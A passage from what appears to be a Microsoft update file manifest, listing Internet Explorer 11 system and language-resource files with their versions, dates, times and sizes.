\nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:28| 2,121,216 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:29| 2,075,648 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:29| 2,063,872 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:30| 2,314,240 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:31| 2,390,528 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 21:32| 2,033,152 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:31| 2,307,584 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:32| 2,255,872 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:33| 2,061,312 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:33| 2,326,016 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:34| 2,019,840 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:35| 2,071,040 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:35| 2,082,816 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:36| 2,307,584 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:37| 2,170,368 \nIeframe.dll.mui| 
11.0.9600.20112| 19-Aug-21| 20:37| 2,153,984 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:38| 2,291,712 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:39| 2,283,520 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:39| 2,052,096 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:40| 2,301,952 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:40| 2,093,056 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:41| 2,075,648 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:42| 2,299,392 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:42| 2,094,592 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:43| 2,316,800 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:44| 2,305,536 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:44| 2,278,912 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:45| 2,285,568 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:46| 2,060,288 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:46| 2,315,776 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:47| 2,279,424 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:47| 2,324,992 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:48| 2,098,176 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:49| 1,890,304 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:50| 1,890,304 \nIeframe.dll| 11.0.9600.20112| 14-Aug-21| 2:52| 15,506,432 \nIeframe.ptxml| Not versioned| 14-Aug-21| 0:50| 24,486 \nInetres.adml| Not versioned| 19-Aug-21| 20:27| 463,373 \nInetres.adml| Not versioned| 19-Aug-21| 20:28| 751,275 \nInetres.adml| Not versioned| 19-Aug-21| 20:28| 526,348 \nInetres.adml| Not versioned| 19-Aug-21| 20:29| 499,703 \nInetres.adml| Not versioned| 19-Aug-21| 20:30| 552,385 \nInetres.adml| Not versioned| 19-Aug-21| 20:30| 944,608 \nInetres.adml| Not versioned| 19-Aug-21| 21:33| 457,561 \nInetres.adml| Not versioned| 19-Aug-21| 20:31| 543,993 \nInetres.adml| Not versioned| 19-Aug-21| 20:32| 751,549 \nInetres.adml| Not versioned| 19-Aug-21| 20:32| 526,607 \nInetres.adml| Not versioned| 19-Aug-21| 20:33| 
575,888 \nInetres.adml| Not versioned| 19-Aug-21| 20:34| 463,373 \nInetres.adml| Not versioned| 19-Aug-21| 20:34| 751,415 \nInetres.adml| Not versioned| 19-Aug-21| 20:35| 570,790 \nInetres.adml| Not versioned| 19-Aug-21| 20:36| 548,171 \nInetres.adml| Not versioned| 19-Aug-21| 20:36| 639,283 \nInetres.adml| Not versioned| 19-Aug-21| 20:37| 525,516 \nInetres.adml| Not versioned| 19-Aug-21| 20:38| 751,258 \nInetres.adml| Not versioned| 19-Aug-21| 20:38| 751,415 \nInetres.adml| Not versioned| 19-Aug-21| 20:39| 488,538 \nInetres.adml| Not versioned| 19-Aug-21| 20:39| 548,544 \nInetres.adml| Not versioned| 19-Aug-21| 20:40| 559,392 \nInetres.adml| Not versioned| 19-Aug-21| 20:41| 535,118 \nInetres.adml| Not versioned| 19-Aug-21| 20:41| 541,505 \nInetres.adml| Not versioned| 19-Aug-21| 20:42| 751,201 \nInetres.adml| Not versioned| 19-Aug-21| 20:43| 804,521 \nInetres.adml| Not versioned| 19-Aug-21| 20:43| 751,577 \nInetres.adml| Not versioned| 19-Aug-21| 20:44| 751,384 \nInetres.adml| Not versioned| 19-Aug-21| 20:44| 751,345 \nInetres.adml| Not versioned| 19-Aug-21| 20:45| 503,959 \nInetres.adml| Not versioned| 19-Aug-21| 20:46| 751,347 \nInetres.adml| Not versioned| 19-Aug-21| 20:47| 521,634 \nInetres.adml| Not versioned| 19-Aug-21| 20:47| 751,305 \nInetres.adml| Not versioned| 19-Aug-21| 20:48| 420,094 \nInetres.adml| Not versioned| 19-Aug-21| 20:49| 436,663 \nInetres.admx| Not versioned| 11-Jul-21| 1:55| 1,678,023 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:27| 29,184 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:28| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:28| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:29| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:30| 35,328 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:31| 37,888 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 21:32| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:31| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:32| 29,696 
\nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:32| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:33| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:34| 27,648 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:34| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:35| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:36| 33,792 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:36| 23,040 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:37| 22,016 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:38| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:39| 31,232 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:39| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:40| 35,840 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:41| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:41| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:42| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:43| 34,816 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:44| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:44| 32,256 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:44| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:45| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:46| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:47| 30,720 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:47| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:48| 16,384 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:48| 16,896 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:49| 16,896 \nJscript9.dll| 11.0.9600.20112| 14-Aug-21| 3:47| 5,508,096 \nJscript9diag.dll| 11.0.9600.20112| 14-Aug-21| 3:12| 814,592 \nJscript.dll| 5.8.9600.20112| 14-Aug-21| 3:12| 785,408 \nVbscript.dll| 5.8.9600.20112| 14-Aug-21| 3:22| 581,120 \nIexplore.exe| 11.0.9600.20112| 19-Aug-21| 18:56| 810,384 \nMshtml.dll| 11.0.9600.20112| 14-Aug-21| 3:33| 20,294,144 \nMshtml.tlb| 11.0.9600.20112| 
14-Aug-21| 3:13| 2,724,864 \nWow64_microsoft-windows-ie-htmlrendering.ptxml| Not versioned| 14-Aug-21| 1:05| 3,228 \nIe9props.propdesc| Not versioned| 21-Mar-21| 3:55| 2,843 \nIeframe.dll| 11.0.9600.20112| 14-Aug-21| 2:47| 13,881,856 \nWow64_ieframe.ptxml| Not versioned| 14-Aug-21| 1:05| 24,486 \nJscript9.dll| 11.0.9600.20112| 14-Aug-21| 2:52| 4,119,040 \nJscript9diag.dll| 11.0.9600.20112| 14-Aug-21| 2:55| 620,032 \nJscript.dll| 5.8.9600.20112| 14-Aug-21| 2:56| 653,824 \nVbscript.dll| 5.8.9600.20112| 14-Aug-21| 3:04| 498,176 \nUrlmon.dll| 11.0.9600.20112| 14-Aug-21| 2:19| 1,342,976 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 46,592 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 56,320 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 57,856 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 49,664 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 47,616 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 49,152 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 55,296 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 45,056 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 53,248 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 39,424 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 35,840 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 50,176 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 53,760 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 54,272 
\nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 53,248 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 50,176 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 30,720 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 30,720 \nInetcpl.cpl| 11.0.9600.20112| 14-Aug-21| 2:35| 2,058,752 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 307,200 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 293,888 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 290,304 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 289,280 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 299,008 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 303,104 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 282,112 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 296,960 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 283,648 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 291,840 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 299,520 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 275,968 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 290,816 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 293,376 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 296,960 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 258,048 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 256,512 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 289,280 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 288,256 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 285,184 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 
19:10| 295,424 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 297,472 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 292,864 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 295,424 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 294,400 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 294,400 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 292,864 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 290,816 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 288,768 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 286,208 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 281,600 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 286,720 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 292,352 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 242,176 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 243,200 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 46,080 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 51,712 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 54,272 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:57| 48,128 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 47,616 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 50,688 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 45,056 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 39,936 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 39,424 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 47,616 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 
19:09| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 51,200 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 50,688 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 48,128 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 48,128 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 35,328 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 35,328 \nJsproxy.dll| 11.0.9600.20112| 14-Aug-21| 2:58| 47,104 \nWininet.dll| 11.0.9600.20112| 14-Aug-21| 2:27| 4,387,840 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 114,176 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 130,560 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 124,928 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 122,880 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 130,048 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 138,240 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 114,688 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 131,584 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 117,760 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 122,368 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 134,144 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 107,008 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 123,392 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 127,488 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 128,512 \nInetcpl.cpl.mui| 11.0.9600.20112| 
19-Aug-21| 19:06| 88,576 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 82,944 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 125,440 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 123,392 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 120,320 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 130,560 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 129,024 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 125,952 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 129,024 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 128,000 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 123,904 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 129,024 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 123,904 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 124,416 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 121,856 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 115,712 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 123,904 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 125,440 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 72,704 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 73,728 \nMsfeedsbs.dll| 11.0.9600.20112| 14-Aug-21| 2:42| 52,736 \nMsfeedsbs.mof| Not versioned| 14-Aug-21| 1:11| 1,574 \nMsfeedssync.exe| 11.0.9600.20112| 14-Aug-21| 3:04| 11,776 \nIeproxy.dll| 11.0.9600.20112| 14-Aug-21| 2:14| 310,784 \nIeshims.dll| 11.0.9600.20112| 14-Aug-21| 2:18| 290,304 \nIertutil.dll| 11.0.9600.20112| 14-Aug-21| 3:07| 2,308,608 \nSqmapi.dll| 6.2.9200.16384| 19-Aug-21| 18:56| 228,256 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 2,066,432 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 2,121,216 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 2,075,648 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 2,063,872 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 2,314,240 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 2,390,528 
\nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 2,033,152 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 2,307,584 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 2,255,872 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 2,061,312 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 2,326,016 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 2,019,840 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 2,071,040 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 2,082,816 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 2,307,584 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 2,170,368 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 2,153,984 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 2,291,712 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 2,283,520 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 2,052,096 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 2,301,952 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 2,093,056 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 2,075,648 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 2,299,392 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 2,094,592 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 2,316,800 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 2,305,536 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 2,278,912 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 2,285,568 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 2,060,288 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 2,315,776 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 2,279,424 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 2,324,992 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 2,098,176 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 1,890,304 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:20| 1,890,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 29,184 
\nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 35,328 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 37,888 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:57| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 27,648 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 33,792 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 23,040 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 22,016 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 31,232 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 35,840 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 34,816 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 32,256 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 30,720 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 16,384 
\nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 16,896 \nPackage.cab| Not versioned| 19-Aug-21| 22:40| 302,983 \n \n### **Windows 7 and Windows Server 2008 R2**\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:19| 1,342,976 \niexplore.exe| 11.0.9600.20112| 19-Aug-2021| 18:17| 810,400 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 31,744 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 36,352 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 35,328 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 36,864 